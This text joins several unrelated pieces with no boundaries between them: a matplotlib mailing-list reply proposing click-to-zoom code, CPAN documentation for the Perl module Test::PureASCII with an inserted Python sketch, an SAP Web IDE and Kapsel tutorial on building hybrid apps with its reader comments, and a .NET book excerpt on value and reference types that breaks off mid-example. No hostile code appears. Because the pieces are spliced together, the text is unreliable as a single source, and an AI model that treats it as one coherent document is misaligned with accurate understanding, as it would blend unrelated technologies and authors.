Willi Richert C-LAB - Cooperative Willi> Computing & Communication Laboratory der Universit=E4t Willi> Paderborn und Siemens Willi> FU.323 F=FCrstenallee 11 D-33102 Paderborn Tel: +49 52 51 60 Willi> - 61 20 Fax: +49 52 51 60 - 60 65 E-Mail: richert@... Willi> Internet: Willi> ------------------------------------------------------- Willi> This SF.Net email is sponsored by: Power Architecture Willi> Resource Center: Free content, downloads, discussions, and Willi> more. Willi> _______________________________________________ Willi> Matplotlib-users mailing list Willi> Matplotlib-users@... Willi> On 10/14/05, Mark Bakker <markbak@...> wrote: > > Hello all - > > I finally found time to fix the axis('scaled') feature. > It is now consistent when zooming, as requested. > In essence, it works the same as axis('equal'), but fixes the > lower-left-hand corner rather than the center of the > subplot. When using axis('scaled') the _autoscaleon is > set to False, so that axis limits will be fixed when > features are added to the figure. You can overwrite this > by setting it the regular way (also works for axis('equal')) > ax.set_autoscale_on(False). > > My last modification is a prototype implementation of > zooming when two axes are linked. The idea behind this > is that when an axis is 'equal' or 'scaled' and another > axis is linked to this axis, that when you are zooming and > changing the size of the subplot, then the size of the > linkes axis should change accordingly. I use this when > I am contouring 2D horizontal data and have a vertical > cross-section linked to the x-axis of the horizontal plot. > When I zoom in on the horizontal plot, the length of the > linked axis now gets changes too! Works great, actually, > but has been implemented for linked x-axis only for now. > It works when zooming in the horizontal data (which > has axis 'equal'), but not yet when zooming in the > linked vertical cross-section. Still working on it. 
Hi, yes this is a step in the right direction! IMO it would also be nice with functionality for zooming in/out on single clicks with the left and right button, e.g. something like the below for backend_bases.py (hope it is not wrapped to death...). Helge

```python
...
def release_zoom(...):
    ...
    # single click: 5 pixels is a threshold
    if abs(x - lastx) < 5 or abs(y - lasty) < 5:
        lastx, lasty = a.transData.inverse_xy_tup((lastx, lasty))
        x, y = a.transData.inverse_xy_tup((x, y))
        Xmin, Xmax = a.get_xlim()
        Ymin, Ymax = a.get_ylim()
        if self._button_pressed == 1:
            # zoom in by 20%, make the clicked point the center
            dx = (Xmax - Xmin) * 0.8 * 0.5
            dy = (Ymax - Ymin) * 0.8 * 0.5
            a.set_xlim((x - dx, x + dx))
            a.set_ylim((y - dy, y + dy))
        elif self._button_pressed == 3:
            # zoom out by 20%, make the clicked point the center
            dx = (Xmax - Xmin) * 1.2 * 0.5
            dy = (Ymax - Ymin) * 1.2 * 0.5
            a.set_xlim((x - dx, x + dx))
            a.set_ylim((y - dy, y + dy))
        self.draw()
        self._xypress = None
        self._button_pressed = None
        self.push_current()
        self.release(event)
        return
    # zoom to rect
    ...
```
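The centre-and-scale arithmetic in Helge's sketch can be factored out and checked in isolation. The helper below (plain Python, no matplotlib required; the name and signature are my own) reproduces the 0.8 zoom-in and 1.2 zoom-out factors:

```python
def zoom_limits(x, y, xlim, ylim, factor):
    """Return new (xlim, ylim) centred on the clicked data point (x, y).

    factor < 1 zooms in (left click uses 0.8 in the patch above),
    factor > 1 zooms out (right click uses 1.2).
    """
    dx = (xlim[1] - xlim[0]) * factor * 0.5
    dy = (ylim[1] - ylim[0]) * factor * 0.5
    return (x - dx, x + dx), (y - dy, y + dy)

# Zooming in around the centre of a 0..10 view shrinks the span from 10 to 8:
xl, yl = zoom_limits(5, 5, (0, 10), (0, 10), 0.8)
assert xl == (1.0, 9.0) and yl == (1.0, 9.0)
```

Keeping the clicked point at the centre of the new limits is what makes repeated single-click zooming feel stable, which is the behaviour the patch is after.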
https://sourceforge.net/p/matplotlib/mailman/matplotlib-users/?viewmonth=200510&viewday=17
Test::PureASCII - Test that only ASCII characters are used in your code

This module allows you to create tests which ensure that only 7-bit ASCII characters are used in Perl source files.

The functions available from this module are described next. All of them accept as first argument a reference to a hash containing optional parameters. The usage of those parameters is explained in the Options section.

- checks that $filename contains only ASCII characters. The optional argument $test_name will be included in the output when reporting errors.
- finds all the Perl source files contained in the directories @dirs recursively and checks that they contain only ASCII characters. blib is used as the default directory if none is given.
- finds all the files (Perl and non-Perl) contained in the directories @dirs recursively and checks that they contain only ASCII characters. The current directory is used as the default if none is given.

Options

All the functions from this module accept the following options:

- @list_of_files can contain any combination of strings and references to regular expressions. Files matching any of the entries will be skipped. For instance:

    all_files_are_pure_ascii({ skip => [qr/\.dat$/] });

- On Perl files, skip any __DATA__ section found at the end.
- Tests fail when any control character other than tab, CR or LF is found.
- Tests fail when tab characters are found.
- Tests fail when carriage return (CR) characters are found. That can be useful when you want to force people working on your project to use the Unix conventions for line endings.
- Tests fail when any CR or LF not part of a CRLF sequence is found. That can be useful when you want to stick to the Windows line-ending conventions.

Hints

The module recognizes some sequences or hints in the tested files that allow specific exceptions to be made. Usually you would include them as Perl comments.
the line where this token is found is not checked for pure-ascii the line where this token is found and the following $n are skipped the test for this file ends when this token is found A nice table containing Unicode and Latin1 codes for common (at least in Europe) non-ASCII characters is available.
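The checks described above are straightforward to reproduce in other languages. Purely for illustration (this is not part of the Perl module, and the function name is my own), a Python sketch of the core scan, covering the default rule that tab, CR and LF are the only permitted control characters:

```python
def find_non_ascii(data: bytes, forbid_tabs=False, forbid_cr=False):
    """Return (line, col, byte) for the first byte that violates the
    pure-ASCII rules, or None if the data is clean.

    Loosely mirrors Test::PureASCII's defaults: tab, CR and LF are
    allowed control characters unless explicitly forbidden.
    """
    allowed_ctrl = {0x0A}          # LF is always allowed
    if not forbid_tabs:
        allowed_ctrl.add(0x09)     # tab
    if not forbid_cr:
        allowed_ctrl.add(0x0D)     # CR
    line, col = 1, 1
    for b in data:
        if b > 0x7F or (b < 0x20 and b not in allowed_ctrl):
            return (line, col, b)
        if b == 0x0A:
            line, col = line + 1, 1
        else:
            col += 1
    return None

assert find_non_ascii(b"hello\nworld\n") is None
# A UTF-8 e-acute starts with the non-ASCII byte 0xC3 at column 2:
assert find_non_ascii("h\u00e9llo".encode("utf-8")) == (1, 2, 0xC3)
```

Reporting the line and column of the first offending byte is what makes this kind of test actionable, which is presumably why the module includes $test_name and location details in its diagnostics.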
http://search.cpan.org/~salva/Test-PureASCII-0.02/lib/Test/PureASCII.pm
Back to Getting Started With Kapsel

SAP Web IDE, Fiori Mobile and the Hybrid Application Toolkit (HAT)

See also Creating an Offline CRUD hybrid mobile app in SAP Web IDE Full-Stack with Hybrid Application Toolkit and End of Maintenance for Hybrid App Toolkit local add-on.

The SAP Web IDE provides a browser-based integrated development environment (IDE) for creating SAPUI5 web applications that can additionally be extended to support hybrid apps through Fiori Mobile and the Hybrid Application Toolkit (HAT). Hybrid applications display their UI with HTML but enable access to native functionality, such as accessing the device's contacts or scanning a barcode, through a JavaScript API that each plugin provides. This enables the same application to run on Android, iOS and Windows with no or minimal code changes. This blog post will demonstrate how to create a SAPUI5 OData based application using the SAP Web IDE and then deploy it as a hybrid app using Fiori Mobile and the HAT.

- SAP Web IDE
- Fiori Mobile (Cloud Builds)
- Hybrid Application Toolkit (HAT) and the Companion App
- Enhance the app with a Barcode Scanner
- Hybrid Application Toolkit (HAT) and Local Builds
- Offline Enabling the Application
- Alternate Method of Offline Enabling the Application
- Updating a Deployed Hybrid App with the AppUpdate plugin (Deploy to CP mobile services)

SAP Web IDE

Some additional tutorials on the SAP Web IDE at the SAP Tutorial Navigator are listed below.

- Enable the Web IDE in the SAP Cloud Platform
- Create a Destination in SAP Cloud Platform

Note that a series of videos on the Web IDE is included in the Learning Center area shown below.

This section will demonstrate how to create and run a web application using the SAP Web IDE. This example will use the OData service that is included in Mobile Services for Development and Operations.

- Open the Development and Operations cockpit. Under Developer, the sample OData service is available.
Note, you may need to press the button to reset the data to the initial state if you are seeing no data or data with mixed languages. This OData service can be accessed by the following URL after correcting the XXXXXXX values. This OData service is useful as it provides each user with their own OData service whose values can be updated and easily reset.

- Next, create a destination to this OData service in the SAP Cloud Platform Cockpit.
- Open the SAP Web IDE by clicking on the following link. Navigate to Services and the SAP Web IDE. Enable it if it is not already enabled. Note that there is a new Web IDE available named Multi-Cloud Version. This blog post currently uses the older SAP Web IDE. Click on Open SAP Web IDE.
- In the SAP Web IDE, under Tools, Preferences, enable the below plugins.
- Create a project from template via the File, New, Project from Template menu. Select SAP Fiori Worklist Application. Specify the project name to be Productlist. Select the Data Connection as shown below. Specify the application settings and bindings as shown below. Run the application. Note a few minor changes were made to the labels as described below.
- A few minor tweaks can be made to the application.
- Modify the i18n.properties file and tweak some of the names to be more descriptive.

worklistViewTitle=Products
worklistTableTitleCount=Products Found ({0})
tableNameColumnTitle=Product
tableUnitNumberColumnTitle=Price
objectTitle=Product Details

- Optionally modify Component.js below the this.setModel call and add the below code, which will cause the OData requests to be made individually rather than as batch requests.

this.getModel().setUseBatch(false);

- Modify Object.view.xml and change the ObjectHeader to display different content.
<ObjectHeader
    id="objectHeader"
    title="{LongDescription}"
    number="{
        path: 'Weight',
        formatter: '.formatter.numberUnit'
    }"
    numberUnit="{WeightUnit}">
</ObjectHeader>

- Note, when the HAT plugin is enabled, an additional setting appears when running the app as shown below. Enabling this setting includes the JavaScript files added by Cordova plugins, which provide additional mobile qualities such as being able to scan a barcode.

Fiori Mobile (Cloud Builds)

This section will demonstrate how the previous application can be packaged as a hybrid application using the Fiori Mobile build service. The following are some related links on the topic.

- SAP Fiori Demo Cloud takes on a mobile focus
- What’s new in the SAP Web IDE Hybrid App Toolkit, 1703
- How to use SAP HCP, mobile service for SAP Fiori
- Mobile Service for SAP Fiori
- The Fiori mobile service developer experience has arrived!

The Fiori Mobile Service has a link to Go to Admin Console, which has the following Getting Started link.

For Fiori Mobile to package the application as a hybrid app, it must first be deployed to the SAP Cloud Portal.

- In the SAP Cloud Platform Cockpit enable the following two services.
- Click on the Portal service tile then click on Go to Service. Click on Create New Site and choose SAP Fiori Launchpad as the template. Select the site and make sure it is published and set to be the default.
- Optionally, right click on the previously created project and choose Fiori Mobile, Select Cordova Plugins and add any additional plugins desired.
- Right click on the Productlist project and choose Deploy, SAP Cloud Platform and register it to the SAP Fiori Launchpad.
- Here is the app running in the SAP Fiori Launchpad. The URL can also be found in the Portal Service cockpit.
- Right click on the Productlist project and choose Fiori Mobile, Build, Build Packaged App. When using the SAP Cloud Platform trial, a maximum of two apps can be created.
The following instructions describe how to delete a previously deployed Fiori Mobile app. Note, the Companion App is covered in the next section but basically adds a refresh button in the top right that, when pressed, reloads the HTML resources of the app. In the Companion App the HTML and JavaScript files are not included in the app but are loaded from the SAP Fiori Launchpad, enabling changes to be tested by simply reloading the page rather than requiring a rebuild and redeploy.

Building a packaged app creates an apk (Android) or ipa (iOS). The Packaging tab chooses between having a single app or an app that has a launchpad with a tile for each app. Note you need to double click on an available app to move it to the Selected Applications table. The below screenshot is an example of multiple tiles being shown in a launchpad. Push notification support can be added to the application. The console shows the build process, which happens in the SAP Fiori Mobile cloud build service. Once the build is complete, the apk file can be downloaded by clicking on the Productlist.apk link. Note, the above screen can be reopened by choosing the Show Build Results menu item. After the apk file has been downloaded it can be installed onto an Android device with the below command.

adb install Productlist.apk

The QR code contains the below URL which shows the app on Mobile Place. The app can also be installed directly by pressing the INSTALL button. Building a Packaged app will also create a non-editable application configuration for the app in the Development and Operations cockpit. This app configuration can be edited (or deleted) in the Fiori Mobile Admin Console. Note the delete button becomes enabled after deleting any entries shown below that are not in a Ready to build status.

- Here is the app that is deployed to the device.
Note this app is a packaged app and contains many of the same plugins that are included in the SAP Fiori Client, which provide a passcode screen and enable the app to access native functionality through JavaScript calls. The passcode policy can be set in the Mobile Secure Admin Console as shown below. The screenshot below shows the Web Inspector invoking the device plugin to find information about the Android device the app is being run on. Note also that all the files that make up the app are loaded from file://.

- After following the above steps, a hybrid application has been built in the cloud and then installed on a mobile device using the Fiori Mobile build service. The deployed app can be a single app or it can display a local launchpad allowing access to multiple Fiori apps. The app can also make use of mobile qualities such as receiving push notifications or many of the other mobile qualities available via Cordova and Kapsel plugins. For additional details on push see Easily add Push Notifications to your mobilised Fiori app with Fiori Mobile DevX.

Hybrid Application Toolkit (HAT) and the Companion App

The following instructions describe how to install the HAT components onto your computer that enable deployment to the companion app or, as discussed in the next section, how to create and build a local project. The companion app shown above is a prebuilt app that includes common Cordova and Kapsel plugins and can be configured to load a URL. When a hybrid app is run in the companion app, changes can be made in the Web IDE and then seen in the companion app by simply double tapping and pressing the refresh button. It can be built locally, which enables the debugging of JavaScript through the Web Inspector, or a non-debuggable version is available at the app stores.

SAP Hybrid App Tool Companion at Google Play Store
SAP Hybrid App Tool Companion at Apple iTunes

The following are some additional links on the topic.
Installing and Setting Up HAT
How to install Hybrid Application Toolkit on Windows
How to use Hybrid Application Toolkit (HAT) and test the apps

- Download the installer from store.sap.com.
- Run SAP_HAT_local-1.25.3\setup.cmd

The above screen checks the versions of the various required components. Each version of HAT is tested to work with specific versions of Node, Cordova and the Kapsel SDK. The versions of Node, Cordova and Kapsel can be determined by running the following commands.

node -v
cordova -v
kapsel -v

The check for the Node version occurs in SAP_HAT_local_1_25_3\setup\scripts\win\check_env.cmd

The following are some commands to uninstall and install a specific Cordova version.

npm uninstall -g cordova
npm cache clean
npm install -g cordova@6.3.1

Finally, the version of Kapsel can be determined by the following items.

echo %KAPSEL_HOME%
C:\SAP\MobileSDK3\KapselSDK

The Kapsel command line interface (CLI) is installed with the following commands.

cd %KAPSEL_HOME%\cli
npm install -g

- The following screen downloads a copy of SAPUI5 that will be included in applications that use the local build and configures the HAT Connector that enables communication between the Web IDE and the build environment installed on your computer. Note that on step 3, the URL for the Web IDE needs to be provided.
- Finally, the Companion App is built, which is an application that contains many of the Cordova and Kapsel plugins commonly used in a hybrid app. Applications can be deployed to this pre-built companion app, reducing the time needed to build and deploy a Cordova app during development.
- Once the HAT install completes, start the HAT Connector.
- Enable the HAT Local Add-on and connect to the HAT Connector in the SAP Web IDE via the Tools, Preferences menu.
- Modify the index.html file and change the frameOptions setting to be allow rather than trusted. For further details see Frame Options.
- Run the application in the Companion App.
Note, that the app being run in the Companion App is loaded over the internet rather than loading the HTML and JavaScript content locally from a file:// URL. This enables the development/deployment cycle to be quick, as the APK file does not need to be rebuilt and reinstalled after making a change to the HTML or JavaScript of the application.

- Note the companion app is a hybrid app and the list of plugins included in it can be seen as shown below. You may wish to remove the privacy screen plugin, which on Android prevents screen mirroring with apps such as Vysor.

cordova plugin remove cordova-plugin-privacyscreen

Enhance the app with a Barcode Scanner

This next section demonstrates a simple change to the application that adds the ability to scan a QR code and have the returned value be placed in the Search field. This change can be quickly applied and tested in the Companion app without having to rebuild and redeploy the application.

- Edit Worklist.view.xml. After SearchField, add the following button.

<content>
    <Button id="barcodebutton" icon="sap-icon://bar-code" press="onBarcodeScan"></Button>
</content>

- Edit Worklist.controller.js and add the following method.

onBarcodeScan: function() {
    var that = this;
    var code = "";
    if (!cordova.plugins.barcodeScanner) {
        sap.m.MessageBox.alert("Barcode scanning not supported");
        return;
    }
    cordova.plugins.barcodeScanner.scan(
        function(result) {
            code = result.text;
            that.getView().byId("searchField").setValue(code);
            var oTableSearchState = [];
            var sQuery = result.text;
            if (sQuery && sQuery.length > 0) {
                oTableSearchState = [new Filter("Name", FilterOperator.Contains, sQuery)];
            }
            that._applySearch(oTableSearchState);
        },
        function(error) {
            sap.m.MessageBox.alert("Scan failed: " + error);
        }
    );
},

- Notice that the change can quickly be tested by double tapping in the Companion App and choosing the refresh button. Notice the barcode scanner button now appears to the right of the search field.
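The scan-success callback above mixes UI updates with a small piece of pure logic: deciding the table search state from the scanned text. As a sketch, that decision can be isolated into a hypothetical helper (the helper name and the injected filter factory are ours, not part of the worklist template), which keeps the logic testable outside of SAPUI5 and a device:

```javascript
// Hypothetical helper: derive the table search state from a scanned value.
// An empty scan clears the filter; otherwise filter by the Name property,
// mirroring the Filter("Name", FilterOperator.Contains, sQuery) call above.
// makeFilter is injected so sap.ui.model.Filter is not needed here.
function buildSearchState(scannedText, makeFilter) {
    if (scannedText && scannedText.length > 0) {
        return [makeFilter("Name", "Contains", scannedText)];
    }
    return [];
}

// Usage with a stand-in for sap.ui.model.Filter:
var stubFilter = function (path, op, value) {
    return { path: path, operator: op, value: value };
};
console.log(buildSearchState("HT-1000", stubFilter).length); // 1
console.log(buildSearchState("", stubFilter).length);        // 0
```

In the controller, the success callback would then reduce to setting the search field value and calling `that._applySearch(buildSearchState(result.text, ...))` with the real Filter constructor.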
- If the Refresh is failing, the following trick might help. In the Chrome Web Inspector (chrome://inspect), switch to the Network tab and disable the cache. Then select the Refresh menu again.

Hybrid Application Toolkit (HAT) and Local Builds

- Right click on the Productlist project, choose Project Settings, Hybrid App Toolkit, Hybrid App Configuration (Local Add-on). Specify an App ID such as com.sap.productlist.
- Under the Plugins section check the Logon Manager, Offline OData, Barcode Scanner and under Cordova select Network Connection. Select SAP Cloud Platform mobile services. Under Logon Options, the Logon screen can be further customized.
- Under OData Endpoint, select SAP Cloud Platform mobile services.
- In the Mobile Service for Development and Operations cockpit create a new application with an App ID of com.sap.productlist. Set the security configuration to be Basic.
  Set the Endpoint URL to be
  Set the Proxy Type to be Internet
  Ensure the Rewrite mode is Rewrite URL (required for offline apps). Add an SSO Mechanism of type Basic.
- Run the app. Note, the console shows the results of the build and deployment process but is truncated after a few screens of output. To see the complete log see C:\Temp\SAP_HAT_local_1_25_3\logs\command.log.

Offline Enabling the Application

Note, there is an issue using older versions of the Kapsel Offline plugin with Android X86 emulators. This is fixed in recent SP 14 PLs. The following blog posts may also be of interest.

- Creating Offline Application based on SAP Web IDE CRUD Master-Detail Template using Hybrid App Toolkit
- Creating an offline app with the mobile service for SAP Fiori – Part 1
- Approve Purchase Order Offline for Mobile
- Getting Started with Kapsel – Part 10 — Offline OData (SP13+)

- In Component.js, comment out the following line.

//this.getModel().setUseBatch(false);

- Modify the manifest.json. Add the following new section.
"sap.mobile": { "_version": "1.1.0", "definingRequests": { "Products": { "dataSource": "mainService", "path": "/Products?$expand=StockDetails" } } }, In the sap.app section add the below entry. "offline": true, - Run the project on a device or emulator. Notice above that the device after the offline store has been initially created can be put in airplane mode and the product data is still available if the app is closed and reopened. - The following bits may be of interest for Kapsel developers. The following files do not appear in the SAP Web IDE but in the hybrid project. - www\mobile.json Contains the appID, serverHost, custom fields for the logon plugin etc as well as some HAT specific settings like proxy and serviceUrl. - www\hybrid\sap-mobile-hybrid.jsThe bootStrap method adds a function that is called by the deviceready event that reads mobile.json and loads hybridodata.js and logon.js - www\hybrid\kapsel\logon.js Contains methods to initialize and use the logon plugin. - www\hybrid\odata\hybridodata.js and offlineStore.js Contains methods to initialize and use the offline plugin. - At this point a hybrid project is created and the regular Cordova commands could be used to deploy the project. The project can also be recreated via the Prepare Hybrid Project menu item. Alternate Method of Offline Enabling the Application The following steps take the output from the Web IDE generated project and place it into a project created from the command line. Then some code is added to register the application with the SCPms server and open an offline store. After following these steps, you will have a better appreciation for what the HAT automates. - The following steps create a hybrid or Cordova project, add the Android platform and add the plugins. 
cordova create C:\Kapsel_Projects\ProductList2 com.sap.productlist2 ProductList2
cd C:\Kapsel_Projects\ProductList2
cordova -d platform add android
cordova plugin add cordova-plugin-network-information
cordova plugin add kapsel-plugin-barcodescanner --searchpath %KAPSEL_HOME%/plugins
cordova plugin add kapsel-plugin-odata --searchpath %KAPSEL_HOME%/plugins
cordova plugin add kapsel-plugin-logon --searchpath %KAPSEL_HOME%/plugins

- Export the source code from the Web IDE. Place the contents of the webapp folder into the www folder.
- Modify the index.html file to initialize the logon plugin and open the offline store before starting the app. Add the following include.

<script type="text/javascript" charset="utf-8" src="cordova.js"></script>

Then add the following code replacing the existing sap.ui.getCore().attachInit method. Also update the serverHost, user and password values.

document.addEventListener("deviceready", myInit, false);
var appId = "com.sap.productlist";
var applicationContext = null;
var context = {
    "serverHost": "hcpms-p174XXXXXXtrial.hanatrial.ondemand.com",
    "https": true,
    "serverPort": 443,
    "user": "dan",
    "password": "mypwd",
    "custom": {
        "hiddenFields": ["farmId", "resourcePath", "securityConfig", "serverPort", "https"],
        "disablePasscode": true
    }
};

function myInit() {
    console.log("In deviceready/myInit");
    var oCore = sap.ui.getCore();
    oCore.attachInit(myRegister);
}

function myRegister() {
    console.log("In register");
    var registerSuccessCallback = function(result) {
        console.log("In registerSuccessCallback");
        applicationContext = result;
        openStore();
    };
    var registerErrorCallback = function(error) {
        console.log("In registerErrorCallback");
        console.log("An error occurred: " + JSON.stringify(error));
        navigator.app.exitApp();
    };
    sap.Logon.init(registerSuccessCallback, registerErrorCallback, appId, context);
}

function openStore() {
    console.log("In openStore");
    jQuery.sap.require("sap.ui.thirdparty.datajs"); // Required when using SAPUI5 and the Kapsel Offline Store
    var properties = {
        "name": "ProductsOfflineStore",
        "host": applicationContext.registrationContext.serverHost,
        "port": applicationContext.registrationContext.serverPort,
        "https": applicationContext.registrationContext.https,
        "serviceRoot": appId,
        "definingRequests": {
            "ProductsDR": "/Products?$expand=StockDetails"
        }
    };
    store = sap.OData.createOfflineStore(properties);

    var openStoreSuccessCallback = function() {
        console.log("In openStoreSuccessCallback");
        sap.OData.applyHttpClient(); // Offline OData calls can now be made against datajs.
        myAppStart();
    };
    var openStoreErrorCallback = function(error) {
        console.log("In openStoreErrorCallback");
        alert("An error occurred" + JSON.stringify(error));
    };
    store.open(openStoreSuccessCallback, openStoreErrorCallback);
}

function myAppStart() {
    sap.ui.require([
        "sap/m/Shell",
        "sap/ui/core/ComponentContainer"
    ], function (Shell, ComponentContainer) {
        // initialize the UI component
        new Shell({
            app: new ComponentContainer({
                height: "100%",
                name: "com.sap.products"
            })
        }).placeAt("content");
    });
}

- Modify the manifest.json file. Remove the following line.

"sap-documentation": "heading"

Modify the dataSources uri as shown below.

"dataSources": {
    "mainService": {
        "uri": "",

- Try it out.

cordova run android

Updating a Deployed Hybrid App with the AppUpdate plugin (Deploy to CP mobile services)

The AppUpdate plugin enables a deployed app that has registered with an SMP or SCPms server to receive updates to the HTML and JavaScript of the application. When the application starts, it checks with the server if there are any updates and, if there are, downloads them and then requests permission from the user to apply them. For additional details on the App Update plugin see Getting Started with Kapsel – Part 3 — AppUpdate (SP13+).

- The development version of the app contains a lot of extra SAPUI5 files in the project\hybrid\www\resources folder.
We will reduce that amount by using the SAPUI5 library included in the Kapsel UI5 plugin, which contains a smaller subset.

- Create a zip file named sapui5-mobile-custom.zip containing the contents of the following folder.

C:\SAP\MobileSDK3\KapselSDK\plugins\ui5\www\resources

- Place that file in the following folder.

C:\Users\user_name\SAPHybrid

- In the Web IDE, in project settings select Hybrid, and choose to use a custom build.
- Choose release mode, since the custom build does not contain all of the SAPUI5 debug libraries.
- Add the App Update plugin to the project and set the Hybrid Revision to be 0.
- Deploy the app to the device or emulator. Notice the size of the resources folder is much smaller (32 MB vs 194 MB) and that the deployment to the device is much faster.
- Make a change to the app that you wish to have updated on the deployed version of the app. For example, remove the barcode scanner button by deleting the barcodebutton in Worklist.view.xml.
- Deploy a zip containing the www folder of the application to the SCPms server. Browse to the generated zip file and press the Deploy button. Note if the upload fails the HTML5.SocketReadTimeout setting can be increased on the mobileservices destination.
- Navigate to the management cockpit for the Mobile Services server and deploy the change.
- The next time the app starts, it will check with the Mobile Services server and send down the updates.

Back to Getting Started With Kapsel

Hi Daniel, thank you for this great introduction to Web IDE in combination with HAT. I have a question about something that is still unclear to me. In my scenario I would like to use Web IDE with HAT and an SAP Mobile Platform 3.0. So far everything works, but I’m searching for a best practice for handling the destination URLs of the OData service. From Web IDE I’m using the Cloud Platform Connector to connect an ABAP backend.
In your example you wrote to change the url in the manifest.json to something like https://<mobile_server>:<port>/<application_name> but when I use the absolute url to my mobile platform and the corresponding service, Web IDE is no longer able to connect, as the mobile platform is in my local network and not reachable for Web IDE. Therefore I’m not able to run my application for testing in Web IDE. Is there any other way (something like a best practice), rather than constantly switching the uri in the manifest.json? I hope I wrote my question clearly enough 🙂 Thank you! Andreas

Hi Daniel, Do you know if there is any documentation available on how to perform flush and refresh for offline applications completely built on the cloud using Fiori Mobile? Also, I’ve only found this document regarding the sap.mobile namespace for the manifest.json file. But a lot of the possible parameters you can use as shown in many different blogs are not listed there. For instance I saw in one of the blogs you referenced for the offline section, that it includes “stores” as an element in the json file. Thanks in advance for your help, Diego

Perhaps take a look at the following blog. Abdul may be better able to help. Regards, Dan van Leeuwen

Hey Daniel. Nice blog. Do you know if offline development can be done using the developer companion?

I don’t believe so. I think the purpose of the developer companion is to have an app whose HTML content is updated between runs, which saves time as an APK does not have to be rebuilt each time you make a code change during your development cycle. Regards, Dan van Leeuwen

Hey Daniel. Thank you for getting back to me. I can see that we can build a developer companion under Fiori Mobile in the webide. Just hoped we could use that somehow. Unfortunately it takes a lot of time when I have to test the app by first building a packaged app and then downloading that to the device.
At the moment I get the error [2018-02-23 12:36:48.02072] [ET] Build failed for [IOS] [ErrorCode: 40001] [ErrorStatus: RESOURCE COLLECTION FAILED] when building the companion app.

I am not sure what might be causing that error. I will forward this comment to a colleague who may be able to help. Regards, Dan van Leeuwen

Hey Daniel. That is great 🙂 thank you so much. I am building using a productive account v. 180215 of the full stack Web IDE. I have used the Master Detail template and put the sap.mobile in the manifest file:

Hey Daniel. Did you manage to find out more on this problem?

Hey Daniel. We are using Fiori Mobile for building our packaged app with the Kapsel offline plugins. We are however experiencing a problem with the bundle id, as it is using a generic com.sap.webide.xa5a880bb81284d458cc57c71e4d69c6d instead of the wildcard bundle prefix we are using in our provisioning profile. Do you know how to change this?

Hi Dan, I took the installer from the HANA tools website named SAP_HAT_local-1.29.1.zip. When trying to install HAT I get the following error:

fatal: unable to access '': error: 1407742E:SSL routines:SSL23_GET_SERVER_HELLO:tlsv1 alert protocol version
Additional error details:
fatal: unable to access ' er-angular.git/': error:1407742E:SSL routines:SSL23_GET_SERVER_HELLO:tlsv1 alert protocol version

Any ideas? Greetings, Danny Van der Steen

Hi Danny, Please ignore the installer on the hana tools site. It is not up-to-date. Please use the SAP Store instead. Thanks, Ludo
Having seen the importance of metadata and IL, let's examine the CTS and the CLS. Both the CTS and the CLS ensure language compatibility, interoperability, and integration. In order to make language integration a reality, Microsoft has specified a common type system by which every .NET language must abide. In this section, we outline the common types that have the same conceptual semantics in every .NET language. Microsoft .NET supports a rich set of types, but we limit our discussion to the important ones, including value types, reference types, classes, interfaces, and delegates.

In general, the CLR supports two different types: value types and reference types. Value types represent values allocated on the stack. They cannot be null and must always contain some data. When value types are passed into a function, they are passed by value, meaning that a copy of the value is made prior to function execution. This implies that the original value won't change, no matter what happens to the copy during the function call. Since intrinsic types are small in size and don't consume much memory, the resource cost of making a copy is negligible and is outweighed by avoiding the performance drawbacks of object management and garbage collection. Value types include primitives, structures, and enumerations; examples are shown in the following C# code listing:

int i;                       // Primitive
struct Point { int x, y; }   // Structure
enum State { Off, On }       // Enumeration

You can also create a value type by deriving a class from System.ValueType. One thing to note is that a value type is sealed, meaning that once you have derived a class from System.ValueType, no one else can derive from your class.

If a type consumes significant memory resources, then a reference type provides more benefits over a value type. Reference types are so called because they contain references to heap-based objects and can be null.
These types are passed by reference, meaning that when you pass such an object into a function, an address of or pointer to the object is passed, not a copy of the object, as in the case of a value type. Since you are passing a reference, the caller will see whatever the called function does to your object. The first benefit here is that a reference type can be used as an output parameter, but the second benefit is that you don't waste extra resources because a copy is not made. If your object is large (consuming lots of memory), then reference types are a better choice.

In .NET, one drawback of a reference type is that it must be allocated on the managed heap, which means it requires more CPU cycles because it must be managed and garbage-collected by the CLR. In .NET, the closest concept to destruction is finalization, but unlike destructors in C++, finalization is nondeterministic. In other words, you don't know when finalization will happen because it occurs when the garbage collector executes (by default, when the system runs out of memory). Since finalization is nondeterministic, another drawback of reference types is that if reference-type objects hold on to expensive resources that will be released during finalization, system performance will degrade because the resources won't be released until these objects are garbage-collected.

Reference types include classes, interfaces, arrays, and delegates, examples of which are shown in the following C# code listing:

class Car {}                   // Class
interface ISteering {}         // Interface
int[] a = new int[5];          // Array
delegate void Process( );      // Delegate

Classes, interfaces, and delegates will be discussed shortly. Microsoft .NET supports value types for performance reasons, but everything in .NET is ultimately an object. In fact, all primitive types have corresponding classes in the .NET Framework.
For example, int is, in fact, an alias of System.Int32, and System.Int32 happens to derive from System.ValueType, meaning that it is a value type. Value types are allocated on the stack by default, but they can always be converted into a heap-based, reference-type object; this is called boxing. The following code snippet shows that we can create a box and copy the value of i into it:

int i = 1;          // i - a value type
object box = i;     // box - a reference object

When you box a value, you get an object upon which you can invoke methods, properties, and events. For example, once you have converted the integer into an object, as shown in this code snippet, you can call methods that are defined in System.Object, including ToString( ), Equals( ), and so forth. The reverse of boxing is of course unboxing, which means that you can convert a heap-based, reference-type object into its value-type equivalent, as the following shows:

int j = (int)box;

This example simply uses the cast operator to cast a heap-based object called box into a value-type integer.

The CLR provides full support for object-oriented concepts (such as encapsulation, inheritance, and polymorphism) and class features (such as methods, fields, static members, visibility, accessibility, nested types, and so forth). In addition, the CLR supports new features that are nonexistent in many traditional object-oriented programming languages, including properties, indexers, and events.[10] Events are covered in Chapter 8. For now let's briefly talk about properties and indexers.

[10] An event is a callback that is implemented using delegates, which is covered shortly.

A property is similar to a field (a member variable), with the exception that there is a getter and a setter method, as follows:

using System;
public class Car
{
    private string make;
    public string Make
    {
        get { return make; }
        set { make = value; }
    }
    public static void Main( )
    {
        Car c = new Car( );
        c.Make = "Acura";       // Use setter.
        String s = c.Make;      // Use getter.
        Console.WriteLine(s);
    }
}

Although this is probably the first time you've seen such syntax, this example is straightforward and really needs no explanation, with the exception of the keyword value. This is a special keyword that represents the one and only argument to the setter method.

Syntactically similar to a property, an indexer is analogous to operator[] in C++, as it allows array-like access to the contents of an object. In other words, it allows you to access an object like you're accessing an array, as shown in the following example:

using System;
public class Car
{
    Car( ) { wheels = new string[4]; }
    private string[] wheels;
    public string this[int index]
    {
        get { return wheels[index]; }
        set { wheels[index] = value; }
    }
    public static void Main( )
    {
        Car c = new Car( );
